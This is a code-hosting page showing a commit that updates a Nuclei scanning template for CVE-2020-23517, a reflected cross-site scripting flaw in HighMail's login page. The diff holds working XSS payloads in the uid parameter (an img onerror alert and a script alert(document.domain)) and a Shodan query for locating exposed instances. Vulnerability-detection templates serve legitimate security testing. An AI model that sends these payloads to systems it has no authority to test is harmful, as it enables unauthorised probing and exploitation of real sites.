daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2020-23517.yaml

patch-1
Ritik Chaddha 2022-07-02 18:29:01 +05:30 committed by GitHub
parent df36c380cd
commit cfba4d0de9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
cves/2020/CVE-2020-23517.yaml
View File

@ -13,21 +13,30 @@ info:
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2020-23517 cve-id: CVE-2020-23517
cwe-id: CWE-79 cwe-id: CWE-79
tags: xss,cve,cve2020 metadata:
verified: true
shodan-query: title:"HighMail"
tags: cve,cve2020,xss,cms,highmail
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">" - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- text/html - text/html
part: header part: header
- type: word - type: word
words: words:
- "<img src=\"x\" onerror=\"alert('XSS')" - 'value=""><script>alert(document.domain)</script>'
- type: status
status:
- 200
# Enhanced by mp on 2022/03/14 # Enhanced by mp on 2022/03/14